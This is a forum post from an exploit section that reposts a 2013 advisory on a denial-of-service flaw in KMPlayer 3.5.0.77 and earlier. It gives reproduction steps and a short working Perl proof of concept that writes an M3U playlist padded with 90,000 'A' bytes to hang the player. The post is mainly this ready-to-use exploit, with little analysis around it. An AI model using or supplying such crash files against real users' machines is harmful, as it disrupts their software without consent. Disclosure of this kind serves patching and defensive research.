Jump to content
Praetorian503

KMPlayer 3.5.0.77 Denial Of Service

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

KMPlayer versions 3.5.0.77 and below suffer from a denial of service vulnerability.

Title : KMPlayer (PlayList M3U) Denial Of Service PoC All Versions
Author : Jigsaw (Abdelmorite Eljoaydi)
Date : 26-01-2013
E-mail : jigsaw0658@gmail.com
Home : Morroco  
Facebook page : facebook.com/abdelmorit.alma
platform : software
Impact : Denial Of Service 
Tested on : KMPlayer (http://www.kmpmedia.net/) Version 3.2-3.3-3.4 and 3.5.00.77
OS : Tested on Windows XP SP1,SP2 and SP3 'Windows 7 is not Vulnerable' other OS maybe Vulnerable           
Risk : Low[+] / Medium[-]

====How to reproduce====
When creating a file with the poc below , you'll have to open the playlist file in kmplayer , a box will pop up just press OK . After that press the play button to trigger the DOS vulnerability . The program will not be able to respond until the process is killed using the task manager .

=========Proof of concept===========
#!/usr/bin/perl
my $j = "\x41" x 90000;
my $h = "\x4D\x33\x55";
my $file = "kmplayer.m3u";
open ($File, ">$file");
print $File $h.$j;
close ($File);
====================================

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...